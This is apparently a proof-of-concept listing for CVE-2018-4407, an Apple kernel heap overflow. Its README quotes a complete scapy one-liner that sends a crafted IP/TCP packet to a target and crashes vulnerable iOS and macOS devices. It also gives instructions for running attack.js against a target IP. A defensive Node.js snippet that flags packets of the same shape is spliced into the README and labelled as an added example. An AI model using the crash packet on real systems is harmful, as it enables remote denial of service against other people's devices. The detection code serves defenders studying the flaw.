CVE-2018-4407 PoC — Kernel Buffer Error Vulnerability in Multiple Apple Products

Source
Associated Vulnerability
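Title: Kernel buffer error vulnerability in multiple Apple products (CVE-2018-4407)
Description: Apple macOS High Sierra and related releases are operating systems developed by Apple (USA) specifically for Mac computers. A security vulnerability exists in the Kernel component of Apple macOS Sierra 10.12.6 and macOS High Sierra 10.13.6. An attacker can exploit this vulnerability to execute arbitrary code (memory corruption).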
Description
Node.js PoC exploit code for CVE-2018-4407
Readme
# node-cve-2018-4407

Node.js PoC exploit code for CVE-2018-4407

Author: Sam Decrock

This script is based on the scapy script provided by Zuk:

<blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet:<br>pip install scapy<br>sudo scapy <br>send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1&quot;*18),(19, “2”*18)]))</p>&mdash; Zuk (@ihackbanme) <a href="https://twitter.com/ihackbanme/status/1057811965945376768?ref_src=twsrc%5Etfw">November 1, 2018</a></blockquote>

It crashes devices with iOS 11 or earlier as well as some versions of OS X.
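
For defenders, the packet in the tweet has a recognisable shape: IPv4 options together with a TCP header padded to its 60-byte maximum by two options of kind 19. The following is an added example, not part of the original README or of `attack.js`; the names `inspect`, `findings` and `sample` and the flagging heuristic are assumptions of this example, and the sample headers are constructed.

```javascript
'use strict';

// Header facts for a raw IPv4 packet (no link-layer header); null if not IPv4.
function inspect(pkt) {
  if (!Buffer.isBuffer(pkt) || pkt.length < 20 || pkt[0] >> 4 !== 4) return null;
  const ipHeaderLen = (pkt[0] & 0x0f) * 4;
  if (ipHeaderLen < 20 || pkt.length < ipHeaderLen) return null;
  const info = { ipOptionsLen: ipHeaderLen - 20, tcpHeaderLen: 0, tcpOptionKinds: [] };
  const firstFragment = (pkt.readUInt16BE(6) & 0x1fff) === 0;
  if (pkt[9] !== 6 || !firstFragment || pkt.length < ipHeaderLen + 20) return info;
  info.tcpHeaderLen = (pkt[ipHeaderLen + 12] >> 4) * 4;
  const end = Math.min(ipHeaderLen + info.tcpHeaderLen, pkt.length);
  for (let i = ipHeaderLen + 20; i < end;) {
    const kind = pkt[i];
    if (kind === 0) break;                      // End of Option List
    if (kind === 1) { i += 1; continue; }       // No-Operation padding
    if (i + 1 >= end || pkt[i + 1] < 2) break;  // truncated or malformed length
    info.tcpOptionKinds.push(kind);
    i += pkt[i + 1];
  }
  return info;
}

// Heuristic, an assumption of this example: flag the traits of the tweet's packet.
function findings(pkt) {
  const info = inspect(pkt);
  if (!info) return ['unparseable'];
  const out = [];
  if (info.ipOptionsLen > 0) out.push('ipv4-options-present');
  if (info.tcpHeaderLen === 60) out.push('tcp-header-max-size');
  if (info.tcpOptionKinds.filter((k) => k === 19).length > 1) out.push('repeated-tcp-option-19');
  return out;
}

// Constructed sample headers (not captured traffic, never sent); filler bytes only.
function sample(ipOptLen, tcpOpts) {
  const ip = Buffer.alloc(20 + ipOptLen, 1);   // option bytes 0x01 = IPv4 No-Operation
  ip[0] = 0x40 | ((20 + ipOptLen) / 4);        // version 4, header length in words
  ip.writeUInt16BE(0, 6);                      // no flags, fragment offset 0
  ip[9] = 6;                                   // protocol TCP
  const tcp = Buffer.alloc(20 + tcpOpts.length);
  tcp[12] = ((20 + tcpOpts.length) / 4) << 4;  // data offset in words
  Buffer.from(tcpOpts).copy(tcp, 20);
  return Buffer.concat([ip, tcp]);
}

const opt19 = [19, 20, ...new Array(18).fill(0)];
console.log(findings(sample(8, [...opt19, ...opt19])));
console.log(findings(sample(0, [2, 4, 5, 0xb4])));
```

Feed `findings` the IPv4 payload of frames from a capture or a tap; any single finding is only a hint, while all three together match the shape of the tweet's packet.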


## Install modules

To install its required modules, run:

	npm install

## Run

To run, pass the target IP address as an argument:

	node attack.js 192.168.1.20

## More information

Original write-up by Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
File Snapshot

[4.0K] /data/pocs/27534df40b55149ad37e328ab8f2cc7501ae9548
├── [3.3K] attack.js
├── [1.0K] LICENSE
├── [ 553] package.json
└── [ 965] README.md

0 directories, 4 files